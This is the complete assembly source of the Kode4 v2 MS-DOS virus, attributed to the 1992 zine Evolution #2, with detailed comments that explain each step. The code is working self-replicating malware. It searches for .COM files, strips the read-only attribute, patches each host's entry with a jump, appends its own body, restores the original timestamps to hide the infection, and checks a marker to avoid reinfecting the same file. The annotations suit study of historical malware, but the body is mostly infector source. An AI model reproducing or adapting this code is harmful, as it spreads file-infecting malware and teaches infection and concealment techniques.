MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm
─────────═════════>>> Article From Evolution #2 - YAM '92
Article Title: Kode 4 v2 Virus
Author: Soltan Griss
;--- single code+data segment in .COM layout: origin 100h, PSP at DS:0
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
;--- size of the appended body (vstart..vend). It is both the amount the
;--- delta search subtracts and the value behind the infection marker
;--- (a host is "already infected" when its jump displacement equals
;--- file size - 3 - V_Length)
V_Length equ vend-vstart
;-----------------------------------------------------------------------
; KODE4 - appending .COM infector, 16-bit real-mode DOS (historical
; sample).
; On-disk layout of an infected host: bytes 0-2 replaced by the jump
; E9 xx xx held in j_code1/j_code2; the body vstart..vend appended at
; the old end of the file, with the host's original first 3 bytes kept
; in temp_buff (the last 3 bytes of the file).
; Register roles after the entry code:
;   si = delta offset: where this copy of the body sits in memory minus
;        its assembled offset; every data reference is adjusted by si
;   bx = DOS handle of the file currently open (set at `next:`)
;   cx/dx (pushed) = host's time/date, restored before the close
; Indicators visible on this page: the search mask "*.com", the text
; " -=+ Kode4 +=-, The one and ONLY!$" and the trailing bytes CD 20 90.
;-----------------------------------------------------------------------
KODE4 proc far
start label near
db 0E9h,00h,00h ;first-generation entry: E9 00 00 = jmp to 103h (vstart)
vstart equ $
;--- delta search: scan forward from 102h for a copy of the 3-byte jump
;--- that sits at 100h; the copy lives in j_code1/j_code2 near the end of
;--- the appended body, so its address tells where the body was loaded
mov si,100h ;si -> the jump at 100h (pattern to match)
mov di,102h ;di -> scan cursor (first test is at 103h)
lback: inc di ;advance the scan cursor
mov ax,word ptr [si] ;ax = first word of the jump at 100h
cmp word ptr [di],ax ;same first word at the cursor?
jne lback ;no: keep scanning
mov ax,word ptr [si+1]
cmp ax,word ptr [di+1] ;second word must match too (3 bytes in all)
je lout
jmp lback
lout: add di,3h ;di -> byte after the copy = temp_buff in memory
sub di,(v_length+100h) ;temp_buff assembles at 100h+v_length, so
mov si,di ;si = delta (0 for the first generation)
;**********************************************************************
;*
;* The above code can be re-written as follows...
;* The above idea, although it works is very long in code....
;* when DOS does a load and execute it pushes all registers the last
;* register to be pushed contains the file length. so just subtract
;* the current location
;**********************************************************************
;
;
;
;Host_Off: pop bp
; sub bp,offset host_off
; mov si,bp
;
;*** Before opening any file copy the original three bytes back to 100h
;*** Because they will get overwritten when you check any new files
;--- temp_buff holds the host's original bytes 0-2 (CD 20 90 = INT 20h /
;--- NOP in the first generation); put them back so `done:` runs the host
lea di,temp_buff
add di,si ;delta-adjust
mov ax,word ptr [di]
mov cl,byte ptr [di+2]
mov di,100h
mov word ptr [di],ax
mov byte ptr [di+2],cl
;--- directory walk: INT 21h/4Eh find-first here, 4Fh find-next at Finish
mov ah,4Eh ;Find first Com file
mov dx,offset filename ; offset of "*.com"
add dx,si
int 21h
jnc back
jmp done ;no .com in the current directory
Back:
;--- clear the read-only attribute so the host can be opened for writing
;--- (9Eh = filename field of the default DTA at PSP:80h; PSP-relative,
;--- hence no delta adjustment)
mov ah,43h ;get rid of read only
mov al,0 ;4300h: get attributes -> cx
mov dx,9eh
int 21h
mov ah,43h
mov al,01 ;4301h: set attributes from cx
and cx,11111110b ;bit 0 = read-only, cleared
int 21h
mov ax,3D02h ;Open file for read/writing
mov dx,9Eh ;get file name from file DTA
int 21h
jnc next
jmp done
next: mov bx,ax ;save handle in bx
mov ah,57h ;get time date
mov al,0 ;5700h: cx = time, dx = date
int 21h
push cx ;put in stack for later
push dx
mov ax,4200h ; Move ptr to start of file
xor cx,cx
xor dx,dx
int 21h
mov ah,3fh ;load first 3 bytes
mov cx,3
mov dx,offset temp_buff ;host's original bytes 0-2 -> temp_buff
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax,4202h ;returns the new position (file size) in dx:ax
int 21h
sub ax,3 ; Fix for real location: a jmp at 100h is relative to 103h,
; so size-3 is the displacement that lands on the old end of file
push ax
; nop ;
; nop ; used for debugging
; nop ;
; nop ;
; nop
mov di,offset temp_buff
add di,si ;di -> the 3 bytes just read
mov word ptr [j_code2+si],ax; Save two bytes in a
; word [jumpin] - j_code2 now holds the displacement of the jump that
; will be written at host offset 0 (j_code1 = E9 precedes it)
;--- already-infected check: host starts with E9 and its displacement
;--- equals size-3-v_length, i.e. the existing jump already lands on a
;--- body of exactly this size at the end of the file (infection marker)
cmp byte ptr [di],0e9h ;look for a jmp at begining
jne infect ;NOTE(review): the word pushed at `push ax` above is not
; popped on this path; Finish's pop dx/pop cx then appear to receive
; (size-3, old dx) instead of (old dx, old cx), so the timestamp put back
; on a host that did not start with E9 is not the original and one word
; stays on the stack per such file - a forensic artifact of this sample
mov cx,word ptr [di+1] ;cx = displacement of the host's current jump
pop ax
sub ax,v_length
cmp ax, cx ; jump (id string to check)
jne infect
jmp finish ;marker matched: already infected, leave it alone
infect:
;--- write the 3-byte jump over host bytes 0-2, then append the body
xor cx,cx ;move file pointer to begining
xor dx,dx ;to write jump
mov ax,4200h
int 21h
mov ah,40h ;write jump in first 3 bytes
mov cx,3
mov dx, offset j_code1 ;E9 followed by j_code2 (3 bytes)
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax, 4202h
int 21h
mov dx,offset vstart
add dx,si ;Start writing at top of virus
mov cx,(vend-vstart) ; Set for length of virus
mov ah,40h ;Write Data into the file
int 21h
;--- the appended copy ends with temp_buff, so the host's original bytes
;--- 0-2 are recoverable from the last 3 bytes of an infected file
Finish: pop dx ;Restore old dates and times
pop cx
mov ah,57h
mov al,01h ;5701h: set time (cx) / date (dx) so mtime looks untouched
int 21h
mov ah,3Eh ;Close the file
int 21h ;bx = handle from `next:`
mov ah,4Fh ;Find Next file
int 21h
jc done ;no more matches
jmp back
done:
;--- return to the host: bytes 0-2 at 100h were restored above; for the
;--- first generation they are INT 20h (terminate)
mov bp,100h
jmp bp
;--- data, all addressed via si (delta)
filename db "*.com",0 ;search mask for find-first/find-next
DATA db " -=+ Kode4 +=-, The one and ONLY!$" ;not referenced by any
; instruction on this page; carried in every infected file (static signature)
j_code1 db 0e9h ;jmp opcode written at host offset 0
j_code2 db 00h,00h ;displacement, patched in memory before the write
temp_buff db 0cdh,020h,090h ; CD 20 NOP - first-generation host bytes 0-2;
; overwritten per host with its original bytes 0-2 by the read at `next:`
kode4 endp
vend equ $ ;end of the appended body (temp_buff is its last 3 bytes)
seg_a ends
end start ;entry point = the 3-byte jump at 100h